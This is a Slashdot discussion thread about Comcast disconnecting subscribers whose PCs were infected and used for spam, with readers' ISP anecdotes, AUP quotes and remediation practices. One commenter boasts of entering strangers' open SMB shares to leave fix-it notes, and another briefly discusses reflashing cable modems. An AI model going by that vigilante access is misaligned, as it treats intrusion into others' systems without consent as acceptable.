Slashdot Mirror
Comcast Cuts Infected PCs' Network Connections
fidget42 writes "I just noticed this article over at Infoworld. It seems that Comcast is finally doing something about the machines on their network that are being used by spammers. They are now cutting off service to those customers who have computers that have been hijacked by spammers. Now, if only other broadband ISPs would start policing their user base ..."
I know anecdotal evidence is pretty much worthless, but my friend got infected with all sorts of nasty ad/malwares, along with Blaster and a couple other worms. Cox deactivated his cable modem, he had to call them and go through phone hell to get his service back. So I'm not really sure it's only Comcast doing this.
I'm on top of my game like I'm standin' on Xbox.
I had a machine on AT&T (now Comcast) that was infected by a worm. Bummer. I'll tell you, you have to keep up with those service packs even if you're going to directly connect to the network for "just a few hours".
Anyhow, my friends at AT&T Broadband (the ones that never answered their phone) sent me a nastygram telling me that I was doing a bit too much port scanning for their liking (duh...)
So I ripped the machine of the network and poked around. Yep, it turned out that my machine was infected a few hours after I installed the OS, and it was doing it's bad thing for WEEKS.
At the time, AT&T just "informed me" that I should stop doing bad things. I think it would have been prudent for them to kill my service until I took corrective action.
Of course, this was 3 years ago or so... a more innocent time...
Here is Comcast's Terms Of Service.
From the AUP:
Note: Comcast reserves the right to immediately terminate the Service and the Subscriber Agreement if you engage in any of the prohibited activities listed in this AUP or if you use the Comcast Equipment or Service in a way which is contrary to any Comcast policies or any of Comcast's suppliers' policies. You must strictly adhere to any policy set forth by another service provider accessed through the Service.
So they can terminate service, based on violation of the subarticles:
(vii) restrict, inhibit, or otherwise interfere with the ability of any other person, regardless of intent, purpose or knowledge, to use or enjoy the Service, including, without limitation, posting or transmitting any information or software which contains a worm, virus, or other harmful feature, or generating levels of traffic sufficient to impede others' ability to send or retrieve information;
And transmitting a virus is definitely a violation. Still, it would be nice if there was more information on what will cause them to pull the plug.
Take a look at this site and you will be able to imagine it quite easily.
Why would you need to send test email, be they viruses or spam, via your isp's network? If you need to test filters or anti-virus configuration on your mail server do it locally - surely that's the responsible thing to do. I wouldn't want to propogate a virus even the eicar test virus outside of the networks I directly control. (Yes, I'm well aware the eicar test is benign, but that's not the point.)
you know, where you see stuff like this recurring in your web server's logs...offending ip removed...
the people they are cutting off are sending out daily attacks to multiple machines, not just once or twice sending out crap here and there. i think you'll be ok.
Grandparent has a fair point, but parent reflects the situation where I am.
I use my university's network for internet access, paying UK60 a year for access in my room. At the start of the year there were a lot of virus-related problems, mostly people bringing machines in from home and plugging them in without a firewall or AV software.
Network Services don't insist on this. They don't insist on a virus scan first. What they DO do is cut you off if your PC is causing a nuisance to the network, because they're only three men taking care of the main servers and staff terminals (public terminals are someone else's responsibility).
A lot of people whine about it, but IMHO it's fair policy. They're busy enough without having to help the blissfully clueless. That said, it wouldn't kill them if your 60 included a CD with, say, ZoneAlarm and AVG on... (I distributed similar CDs to friends, with Mozilla Firebird, just so they didn't pick up anything nasty.)
The moral of the story: well, there are two. The first is "You're paying us for the service, not for us to hold your hand and show you how to use your computer." The second is that some people really need to be beaten around the head with a clue-by-four.
"It is dark. You are likely to be eaten by a grue." -- Zork
The ISP I work for (Adelphia, thus Anon :) ) is working on a way to handle customers like these.
-First, the customer is identified, then placed into a 'walled zone'.
-This walled zone will route/allow the cable modem to go only to one specific location, a certain web page in this case.
-Said web page will include downloads for virus fixes and such. Customer goes there, downloads, and cleans up his computer.
-When it has been verified that the customer has gone there and cleaned up, they check his system, then reactivate his account.
To me it seems like a pretty nifty way of stopping virus spreading while keeping the customer informed of what's going on.
I administer a large DSL/dialup userbase and I monitor upstream bandwidth as much as I can. If I notice a DSL customer that has 100% of their upstream bandwidth used I usually check the traffic to see if its email. I will notify the customer and give them a day or two to rectify the problem. If the problem is not fixed within 48 hours I will disable that PVC which will effectively drop sync from the users modem. When the customer comes home, they are now forced to fix the problem. I try to explain to them as politely as possible that they are contributing to the junk mail problem that they are always complaining about and that we had to disable their connection to prevent this. Most people understand and the lack of internet connection gives them the initiative to get up and go purchase some AV software and to run Spybot or some similar program. They phone back once their computer is clean and I turn the circuit back on.
You create your own reality - Leave mine to me.
Frankly those users have ignored all the obvious aspects of being infected (100% cable light flashing)
My cable light has been flashing intermittently ever since the latest Windows worm. It's not because my (Fedora Linux) computer is infected, it's because every other infected computer on the net is periodically scanning my entire block of IP addresses. Every time they try to infect an unused address in that block, our helpful routers send an ARP packet to every cable modem user. I've seen more than a hundred per second during bad periods.
Maybe DSL users (who don't have to share the same bandwidth with everyone in their neighborhood) or users at smarter cable modem companies (who could be caching these things a bit longer, not sending out ARP requests for the same IP address every few seconds) would see a difference if they were infected by a virus, but at least Road Runner Austin users are probably all used to constantly flickering cable modem lights by now.
Now, most cable modems have solder pads for a diagnostic connector, which is usually a 3 wire RS-232 serial connection. Sometimes it uses an unusual voltage, and you need a little box to change the levels. If you got access to the diagnostic connector, and your modem had the proper flash image in it, then you could program it through the diagnostic interface.
I can imagine that some modems you purchase from Fry's or what have you will look for config on ethernet, though I doubt many of them do.
For more insight on why this typically won't work, the default route on the device typically points to the cable interface, or does not exist if the cable interface is not hot, and the device has two modes of operation with regard to IP addresses on the internal interface; either it sets itself to 192.168.100.1, or it sets itself to whatever the config file tells it, and it starts proxying DHCP requests. Either way it is not going to be able to find your bogus TFTP server on the network unless it is badly misconfigured to begin with.
"You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
The problem here is that Comcast is doing shutting down people's connections with no recourse to find out why or to re-enable it.
I received an email and an automated phone call from Comcast stating that I had an infected computer and I must clean it up. I was immediately pleased that they noticed, but frustrated that I could be infected. 5 PCs with varying OSs, all with firewalls and/or antivirus software, so I thought it was unlikely but possible. After doing a full scan I found no viruses.
So I called Comcast's 800 number. They said I need to call a different long-distance number. That number is an automated system with nothing but dead ends. If I select the option about "Viruses and spam emails" then it tells me to email abuse at comcast.net if I get a bad email. But I don't want to report a spam, I received a report. All the options did approximately the same thing: Told me something I already know then hung up. Several calls later, I used the "leave a message" option. A week goes by and I received no call back. I replied to the email but received no response. Nobody on the service number would talk to me about it.
So I receive another email telling me that my service may be disabled if I don't fix the problem. So what do I do now?
To top it off, this isn't the first time. About 8 months ago, Comcast calle and told me I was reported for sending spam. When the read me part of the SpamCop report (which they refused to do many times) it turned out to be a SpamCop report that my roommate made! We _reported_ the spam, we didn't _send_ it! After much arguing, the guy finally got it and left us alone. Mistakes happen, but what irks me the most is that they wanted to tell me I sent a spam, and make sure I corrected my behavior, but refused to tell me the source of the report, or what the email was, or when it was sent, or anything!
Below is the email Comcast sent me. It looks like a form email, with no specific statement about what went wrong.
But, users are dumb, and I'll agree with that. Last summer when the blaster worm came out, we emailed out customers ahead of time telling them they need to download the microsoft patch.
On top of that, the Microsoft Windows Update popup that comes up by default, once a week, users still continue to ignore it because they don't know what it does.
Personally, I'd like to see more type of this internet policing by ISP's. They should also be blocking people who have open SMB shares on their Windows Networks. I cant count the number of times I've purposely went in Someones SMB share and dropped a text file telling them how to fix it.
I, however, disagree with the Government policing of the internet. I believe the internet should be policed by the people who pay for it to be there. That would be us and the ISP's
We as the People-Who-Know need to be spending time helping those who don't to become self-reliant, rather than telling them 'Sorry. You can't access the net until you clean up your system. Sorry, I can't really help you do it. Call someone else.'
Comcast is already doing this. From the article:
So, they block their access to trigger the support call, and then help them secure their machine. I think this is the right approach.GreyPoopon
--
Why is it I can write insightful comments but can't come up with a clever signature?
No it's not, that's some bozo trying to "root" your machine. That's a traverse directory attack they are attempting. It happens all day, every day, and it's NOT what Comcast is going after. Webserver logs show you who is trying to connect to your WEBSITE, it has NOTHING to do with SPAM. If you want to see who these bozo's are just look at the header of your spam email and do a TRACERT (or TRACERTE) to there IP address and see if it's a Comcast subnet (or names resolve...). It may be a cheap virus, it may be some hackers scanning tool, but most Comcast customers are not running old versions of IIS (which is what they are trying to infect by the weblog you posted.).. Check out the Security Focus website for more information..
Mod +5 Drunk
It's a reference to the Blues Brothers, one of the greatest movies ever made. If you haven't seen it then you just don't understand the blues.
Jake: "Hey what's goin' on?"
Cop: "Oh those bums won their court case so they're marching today"
Jake: "What bums?"
Cop: "The fucking Nazi party!"
Jake: "Illinois Nazis"
Elwood: "I hate Illinois Nazis!"
Maybe we DID take the blue pill. You wouldn't remember anyway.